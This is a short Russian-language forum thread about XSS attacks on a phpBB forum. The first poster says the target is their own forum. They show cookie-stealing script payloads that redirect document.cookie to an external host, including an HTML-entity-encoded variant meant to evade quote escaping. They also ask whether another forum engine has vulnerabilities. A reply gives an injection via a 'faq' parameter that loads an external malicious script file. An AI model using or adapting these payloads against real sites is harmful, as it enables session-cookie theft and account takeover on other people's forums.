Решил попробовать взломать свой форум на phpBB с помощью xss-уязвимости (для sql-баги, нужно чтобы была возможность пересылать приваты, а это есть не везде). Долго мучался, но так нефига и не получилось. Если вводить так(брал любую описанную xss-багу):<script>document.location="http://www.asd.as/as.php?xack="+docu...lt;/script>, то скрипт добавляет слеши перед каждой ковычкой. А если так (в 10'ой кодировке):<script>document.location&a mp;#61&#34www.asd.as/as.php?xack&#61&#34&#43document.cookie </script>, то строка выполняется только до "<script>document.location=" и соответственно нарушается синтаксиc штмл, и весь остальной код не воспроизводится. Объясните где логика?
PS Кто нибудь слышал про движок textus? Есть ли там уязвимости?
Я тоже с этим мучился - без кавычек - кукисы не спереть =(
я решил это так:
Просто выполнялся скрипт не из url'а, а из файла faq[0][0]=<script src=\localhost/bad.js></script>